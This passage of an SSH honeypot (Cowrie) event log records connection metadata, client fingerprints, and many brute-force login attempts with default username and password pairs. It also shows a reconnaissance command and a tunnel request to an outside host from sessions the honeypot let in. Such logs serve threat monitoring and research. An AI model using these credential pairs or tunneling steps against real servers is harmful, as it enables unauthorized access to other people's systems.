poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:20:38.028960Z","src_ip":"196.251.86.249","session":"c80e532b990a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:38.047336Z","src_ip":"212.227.125.160","session":"c71f3a07ee6b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:39.023410Z","src_ip":"93.123.109.189","session":"5782f1522ffa"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"qwe123","message":"login attempt [hadoop/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:20:40.617237Z","src_ip":"196.251.86.249","session":"c80e532b990a"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:42.255878Z","src_ip":"196.251.86.249","session":"c80e532b990a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41396,"dst_ip":"1.2.3.4","dst_port":22,"session":"a686f168488d","protocol":"ssh","message":"New connection: 212.227.125.160:41396 (1.2.3.4:22) [session: a686f168488d]","sensor":"my-vps","timestamp":"2025-08-26T11:20:42.615673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:20:42.617329Z","src_ip":"212.227.125.160","session":"a686f168488d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:20:42.668232Z","src_ip":"212.227.125.160","session":"a686f168488d"}
{"eventid":"cowrie.login.failed","username":"kingbase","password":"kingbase","message":"login attempt [kingbase/kingbase] failed","sensor":"my-vps","timestamp":"2025-08-26T11:20:42.866489Z","src_ip":"212.227.125.160","session":"a686f168488d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:43.918616Z","src_ip":"212.227.125.160","session":"a686f168488d"}
{"eventid":"cowrie.session.connect","src_ip":"175.110.65.134","src_port":6535,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dda4865907d","protocol":"ssh","message":"New connection: 175.110.65.134:6535 (1.2.3.4:22) [session: 9dda4865907d]","sensor":"my-vps","timestamp":"2025-08-26T11:20:47.128844Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-26T11:20:47.133391Z","src_ip":"175.110.65.134","session":"9dda4865907d"}
{"eventid":"cowrie.client.kex","hassh":"14b2ddda386a4d1006108ccd231b42fc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 14b2ddda386a4d1006108ccd231b42fc","sensor":"my-vps","timestamp":"2025-08-26T11:20:47.155434Z","src_ip":"175.110.65.134","session":"9dda4865907d"}
{"eventid":"cowrie.login.failed","username":"gabriel","password":"gabriel","message":"login attempt [gabriel/gabriel] failed","sensor":"my-vps","timestamp":"2025-08-26T11:20:47.259192Z","src_ip":"175.110.65.134","session":"9dda4865907d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42166,"dst_ip":"1.2.3.4","dst_port":22,"session":"a68a6a5039c2","protocol":"ssh","message":"New connection: 212.227.125.160:42166 (1.2.3.4:22) [session: a68a6a5039c2]","sensor":"my-vps","timestamp":"2025-08-26T11:20:47.917234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:20:47.975419Z","src_ip":"212.227.125.160","session":"a68a6a5039c2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:20:48.103776Z","src_ip":"212.227.125.160","session":"a68a6a5039c2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:48.287333Z","src_ip":"175.110.65.134","session":"9dda4865907d"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:20:48.725188Z","src_ip":"212.227.125.160","session":"a68a6a5039c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:20:48.897465Z","src_ip":"212.227.125.160","session":"a68a6a5039c2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:20:48.898242Z","src_ip":"212.227.125.160","session":"a68a6a5039c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23563,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd19f14fb6e8","protocol":"ssh","message":"New connection: 212.227.125.160:23563 (1.2.3.4:22) [session: bd19f14fb6e8]","sensor":"my-vps","timestamp":"2025-08-26T11:20:48.899723Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:48.900831Z","src_ip":"212.227.125.160","session":"bd19f14fb6e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:48.949433Z","src_ip":"212.227.125.160","session":"a68a6a5039c2"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:48.950547Z","src_ip":"212.227.125.160","session":"a68a6a5039c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23850,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fdd73f57021","protocol":"ssh","message":"New connection: 212.227.125.160:23850 (1.2.3.4:22) [session: 7fdd73f57021]","sensor":"my-vps","timestamp":"2025-08-26T11:20:48.985261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:20:48.986222Z","src_ip":"212.227.125.160","session":"7fdd73f57021"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T11:20:49.097413Z","src_ip":"212.227.125.160","session":"7fdd73f57021"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:20:49.432803Z","src_ip":"212.227.125.160","session":"7fdd73f57021"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T11:20:49.544957Z","session":"7fdd73f57021"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42934,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7b2d8c1460d","protocol":"ssh","message":"New connection: 212.227.125.160:42934 (1.2.3.4:22) [session: a7b2d8c1460d]","sensor":"my-vps","timestamp":"2025-08-26T11:20:54.058283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:20:54.118366Z","src_ip":"212.227.125.160","session":"a7b2d8c1460d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:20:54.119102Z","src_ip":"212.227.125.160","session":"a7b2d8c1460d"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:20:54.445355Z","src_ip":"212.227.125.160","session":"a7b2d8c1460d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:55.497181Z","src_ip":"212.227.125.160","session":"a7b2d8c1460d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43702,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cd4af29df14","protocol":"ssh","message":"New connection: 212.227.125.160:43702 (1.2.3.4:22) [session: 6cd4af29df14]","sensor":"my-vps","timestamp":"2025-08-26T11:21:00.125963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:00.144615Z","src_ip":"212.227.125.160","session":"6cd4af29df14"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:00.220375Z","src_ip":"212.227.125.160","session":"6cd4af29df14"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:00.489376Z","src_ip":"212.227.125.160","session":"6cd4af29df14"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:01.596012Z","src_ip":"212.227.125.160","session":"6cd4af29df14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44472,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1d707996399","protocol":"ssh","message":"New connection: 212.227.125.160:44472 (1.2.3.4:22) [session: c1d707996399]","sensor":"my-vps","timestamp":"2025-08-26T11:21:06.085290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:06.091381Z","src_ip":"212.227.125.160","session":"c1d707996399"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:06.152775Z","src_ip":"212.227.125.160","session":"c1d707996399"}
{"eventid":"cowrie.login.failed","username":"trytan","password":"trytan","message":"login attempt [trytan/trytan] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:06.379703Z","src_ip":"212.227.125.160","session":"c1d707996399"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:07.431382Z","src_ip":"212.227.125.160","session":"c1d707996399"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45244,"dst_ip":"1.2.3.4","dst_port":22,"session":"71ce9e9e26a6","protocol":"ssh","message":"New connection: 212.227.125.160:45244 (1.2.3.4:22) [session: 71ce9e9e26a6]","sensor":"my-vps","timestamp":"2025-08-26T11:21:11.908342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:11.909242Z","src_ip":"212.227.125.160","session":"71ce9e9e26a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:11.960733Z","src_ip":"212.227.125.160","session":"71ce9e9e26a6"}
{"eventid":"cowrie.login.failed","username":"digital","password":"digital","message":"login attempt [digital/digital] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:12.114911Z","src_ip":"212.227.125.160","session":"71ce9e9e26a6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:13.166719Z","src_ip":"212.227.125.160","session":"71ce9e9e26a6"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":44510,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6ca0bd9b1c4","protocol":"ssh","message":"New connection: 83.168.105.65:44510 (1.2.3.4:22) [session: f6ca0bd9b1c4]","sensor":"my-vps","timestamp":"2025-08-26T11:21:15.295466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:15.296422Z","src_ip":"83.168.105.65","session":"f6ca0bd9b1c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","a